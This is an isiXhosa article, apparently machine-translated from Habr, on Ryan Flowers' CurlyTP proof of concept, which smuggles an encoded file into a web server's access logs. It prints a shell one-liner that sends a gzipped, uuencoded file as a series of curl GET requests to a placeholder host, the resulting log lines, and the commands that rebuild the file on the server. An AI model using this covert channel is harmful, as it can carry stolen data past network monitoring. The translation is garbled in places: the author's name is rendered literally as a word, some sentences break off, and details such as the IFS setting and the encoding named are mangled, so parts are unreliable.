Ngokutsho kwenkcazo yeWikipedia, ithontsi efileyo sisixhobo seyelenqe esisebenzela ukutshintshiselana ngolwazi okanye ezinye izinto phakathi kwabantu abasebenzisa indawo eyimfihlo. Umbono kukuba abantu abaze badibane - kodwa basabelana ngolwazi ukugcina ukhuseleko lokusebenza.
Indawo yokufihla akufanele itsalele ingqalelo. Ke ngoko, kwihlabathi elingaxhunyiwe kwi-intanethi bahlala besebenzisa izinto ezilumkileyo: isitena esixekileyo eludongeni, incwadi yethala leencwadi, okanye umngxuma emthini.
Zininzi izixhobo ezifihliweyo kunye nokungaziwa kwi-Intanethi, kodwa eyona nyani yokusebenzisa ezi zixhobo itsala umdla. Ukongeza, banokuvalelwa kwinqanaba leshishini okanye likarhulumente. Kwenziwe ntoni?
Umphuhlisi weRyan Flowers ucebise ukhetho olunomdla -
Kuyavela ukuba nayiphi na iseva yewebhu ikuvumela ukuba ugcine phantse nawuphi na umyalezo kwilogi. Iintyatyambo zazibuza ukuba zingayisebenzisa njani le nto.
Unika olu khetho:
- Thatha ifayile yombhalo (umyalezo oyimfihlo) kwaye ubale i-hash (md5sum).
- Siyikhowudi (gzip+uuencode).
- Sibhalela kwilogi usebenzisa isicelo esingalunganga ngamabomu kumncedisi.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
Ukufunda ifayile, kufuneka wenze le misebenzi ngokulandelelana: decode kwaye unzip ifayile, khangela i-hash (i-hash inokudluliselwa ngokukhuselekileyo kwiziteshi ezivulekileyo).
Izithuba zitshintshwa nge =+=
ukuze kungabikho zithuba kwidilesi. Inkqubo, leyo umbhali abiza ngokuba yi-CurlyTP, isebenzisa i-base64 encoding, njengezihlomelo ze-imeyile. Isicelo senziwa ngegama elingundoqo ?transfer?
ukuze umamkeli akwazi ukuyifumana lula kwiilog.
Sibona ntoni kwizigodo kule meko?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
Njengoko sele kukhankanyiwe, ukufumana umyalezo oyimfihlo kufuneka wenze imisebenzi ngolandelelwano:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
Inkqubo kulula ukuzenzekelayo. I-Md5sum iyahambelana, kunye nemixholo yefayile iqinisekisa ukuba yonke into yaqondwa ngokuchanekileyo.
Indlela ilula kakhulu. βInjongo yalo msebenzi kukubonisa nje ukuba iifayile zinokugqithiselwa ngezicelo ezincinci zewebhu, kwaye zisebenza kuyo nayiphi na iseva yewebhu enemibhalo ecacileyo. Ngokwenyani, yonke iseva yewebhu yindawo yokuzimela! β kubhala iintyatyambo.
Ngokuqinisekileyo, indlela isebenza kuphela ukuba umamkeli unokufikelela kwiilog zeseva. Kodwa ukufikelela okunjalo kubonelelwa, umzekelo, ngabamkeli abaninzi.
Indlela yokuyisebenzisa?
URyan Flowers uthi akayiyo ingcali yokhuseleko lolwazi kwaye akayi kuqulunqa uluhlu lweendlela ezinokusetyenziswa kwi-CurlyTP. Kuye, bubungqina nje bengcamango yokuba izixhobo eziqhelekileyo esizibonayo imihla ngemihla zingasetyenziswa ngendlela engaqhelekanga.
Enyanisweni, le ndlela ineenzuzo ezininzi ngaphezu kwesinye iseva "izifihla" ezifana
Le yenye yeendlela zokudlulisa imiyalezo ngeefayile zenkonzo. Unokukhumbula ukuba ezinye iinkampani ezihambele phambili zazidla ngokubeka njani
Ingcamango yayikukuba ngabaphuhlisi bewebhu kuphela abaza kubona eli qanda lePasika, kuba umntu oqhelekileyo akayi kujonga iintloko okanye ikhowudi ye-HTML.
umthombo: www.habr.com